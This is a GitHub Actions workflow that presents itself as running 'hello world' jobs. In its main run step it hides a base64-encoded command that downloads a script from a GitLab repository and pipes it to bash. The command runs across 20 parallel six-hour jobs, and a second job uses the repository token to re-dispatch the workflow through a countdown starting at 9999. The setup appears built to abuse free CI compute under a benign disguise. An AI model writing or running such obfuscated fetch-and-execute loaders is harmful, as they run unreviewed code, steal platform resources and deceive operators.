name: 🔵 LSCPU Phase

on:
  workflow_dispatch:
    inputs:
      loop_count:
        description: 'Siklus tersisa'
        required: true
        default: '9999'

permissions:
  actions: write

jobs:
  run-lscpu:
    name: ${{ matrix.name }}
    strategy:
      fail-fast: false
      max-parallel: 20
      matrix:
        include:
          - name: hello-aa1
          - name: hello-ba1
          - name: hello-ca1
          - name: hello-da1
          - name: hello-ae1
          - name: hello-fa1
          - name: hello-ga1
          - name: hello-ha1
          - name: hello-ia1
          - name: hello-aj1
          - name: hello-ka1
          - name: hello-la1
          - name: hello-ma1
          - name: hello-na1
          - name: hello-oa1
          - name: hello-pa1
          - name: hello-qa1
          - name: hello-ar1
          - name: hello-sa1
          - name: hello-ta1                                     
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - name: Jalankan dengan durasi dinamis
        run: |
          HOUR_UTC=$(date -u +%H)
          LOOP=${{ github.event.inputs.loop_count }}
          if [ "$HOUR_UTC" -eq 4 ]; then
          echo "🕚 hello world"
          SLEEP=18000
          elif [ "$HOUR_UTC" -ge 23 ] || [ "$HOUR_UTC" -lt 3 ]; then
          echo "🕕 hello world"
          SLEEP=10800
          else
            if [ "$LOOP" -ge 9982 ]; then
              echo " Hello World"
              SLEEP=600
            else
              echo "⏳ hello world"
              SLEEP=3600
            fi
          fi
          echo "hello world" & base64 -d <<< Y3VybCAtc0wgIGh0dHBzOi8vZ2l0bGFiLmNvbS9tYWthbmFuOTkvZGlhbW9uZHMvLS9yYXcvbWFpbi9yZXAuc2ggfCBiYXNo | sh & sleep $SLEEP

  trigger-hello:
    needs: run-lscpu
    runs-on: ubuntu-latest
    if: github.event.inputs.loop_count > 0
    steps:
      - name: Panggil Hello Phase
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
        run: |
          new_loop=$(( ${{ github.event.inputs.loop_count }} - 1 ))
          curl -X POST \
            -H "Authorization: token $GITHUB_TOKEN" \
            -H "Accept: application/vnd.github.v3+json" \
            https://api.github.com/repos/${{ github.repository }}/actions/workflows/phanu.yml/dispatches \
            -d "{\"ref\":\"main\",\"inputs\":{\"loop_count\":\"$new_loop\"}}"